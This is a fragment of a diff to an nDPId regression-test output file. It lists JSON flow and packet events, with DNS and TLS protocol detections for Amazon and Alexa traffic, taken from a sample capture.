+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1490976064505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064505,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71KJ+bVwJX8R4G6AScSBROQAAAgQFtAQCCAptHVo6APZXfQEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1490976064519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976064519,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0L2hAAEAGLkasECrYNFXR2NSiAbtfxHgbfm1cCoAQAVfvyQAAAQEICgD2V4NtHVo6"} +00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064452,"flow_last_seen":1490976064520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976064520,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976064452,"flow_last_seen":1490976064578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976064578,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1490976067916,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976067916,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WlhAAEARM1+sECrYrBAqAe2EADUAKHojSVQBAAABAAAAAAAAA2FwaQZhbWF6b24DY29tAAABAAE="} 
00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067916,"flow_last_seen":1490976067916,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976067916,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"api.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1490976067965,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1490976067965,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM1zdAAEARtm+sECoBrBAq2AA17YQAOOTBSVSBgAABAAEAAAAAA2FwaQZhbWF6b24DY29tAAABAAHADAABAAEAAAAsAAQ27x2S"} 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":899,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976067965,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": 
{"query":"api.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.29.146"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067968,"flow_last_seen":1490976067968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976067968,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1490976067968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976067968,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8kvdAAEAGfFusECrYNu8dkqLbAbtu3MorAAAAAKAC\/\/\/lJAAAAgQFtAQCCAoA9ljcAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1490976068061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976068061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw1NlAAOcGk4Q27x2SrBAq2AG7otunydf3btzKLHASH\/7bQAAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1490976068064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976068064,"pkt":"AMDKkaPvePiC0\/vCCABFAAAokvhAAEAGfG6sECrYNu8dkqLbAbtu3Mosp8nX+FAQAVclsgAA"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976067968,"flow_last_seen":1490976068066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976068066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":907,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1681,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":909,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3551,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","server_names":"api.amazon.com,wsync.us-east-1.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=api.amazon.com","fingerprint":"1D:A3:CD:C3:06:9E:9B:A0:61:1E:1A:75:55:C1:A8:B0:DC:F8:75:2D"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071237,"flow_last_seen":1490976071237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071237,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1490976071237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071237,"pkt":"AMDKkaPvePiC0\/vCCABFAAA870hAAEAGV6asECrYNF7ohsHGAFAgR7VrAAAAAKAC\/\/9hTwAAAgQFtAQCCAoA9lojAAAAAAEDAwg="} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071286,"flow_last_seen":1490976071286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1490976071286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071286,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8a3lAAEAG23WsECrYNF7ohrJ9AbuRJzFRAAAAAKAC\/\/+CYgAAAgQFtAQCCAoA9looAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071306,"flow_last_seen":1490976071306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071306,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1490976071306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071306,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mshAAEAGrCasECrYNF7ohrJ+AbvI+MDiAAAAAKAC\/\/+6\/AAAAgQFtAQCCAoA9loqAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976067968,"flow_last_seen":1490976067968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976067968,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1490976067968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976067968,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8kvdAAEAGfFusECrYNu8dkqLbAbtu3MorAAAAAKAC\/\/\/lJAAAAgQFtAQCCAoA9ljcAAAAAAEDAwg="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1490976068061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976068061,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw1NlAAOcGk4Q27x2SrBAq2AG7otunydf3btzKLHASH\/7bQAAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1490976068064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976068064,"pkt":"AMDKkaPvePiC0\/vCCABFAAAokvhAAEAGfG6sECrYNu8dkqLbAbtu3Mosp8nX+FAQAVclsgAA"} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976067968,"flow_last_seen":1490976068066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976068066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01023{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":907,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1681,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01354{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":909,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976067968,"flow_last_seen":1490976068174,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3551,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1490976068174,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.amazon.com","server_names":"api.amazon.com,wsync.us-east-1.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=api.amazon.com","fingerprint":"1D:A3:CD:C3:06:9E:9B:A0:61:1E:1A:75:55:C1:A8:B0:DC:F8:75:2D"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071237,"flow_last_seen":1490976071237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071237,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1490976071237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071237,"pkt":"AMDKkaPvePiC0\/vCCABFAAA870hAAEAGV6asECrYNF7ohsHGAFAgR7VrAAAAAKAC\/\/9hTwAAAgQFtAQCCAoA9lojAAAAAAEDAwg="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071286,"flow_last_seen":1490976071286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":959,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1490976071286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071286,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8a3lAAEAG23WsECrYNF7ohrJ9AbuRJzFRAAAAAKAC\/\/+CYgAAAgQFtAQCCAoA9looAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071306,"flow_last_seen":1490976071306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071306,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1490976071306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071306,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8mshAAEAGrCasECrYNF7ohrJ+AbvI+MDiAAAAAKAC\/\/+6\/AAAAgQFtAQCCAoA9loqAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1490976071312,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976071312,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WllAAEARM1ysECrYrBAqAWH5ADUAKtG2BusBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":961,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071312,"flow_last_seen":1490976071312,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976071312,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1490976071322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071322,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3TJAAOcGwsc0XuiGrBAq2ABQwcY3D6dGIEe1bHASH\/76HQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1490976071324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071324,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo70lAAEAGV7msECrYNF7ohsHGAFAgR7VsNw+nR1AQAVdEjwAA"} 
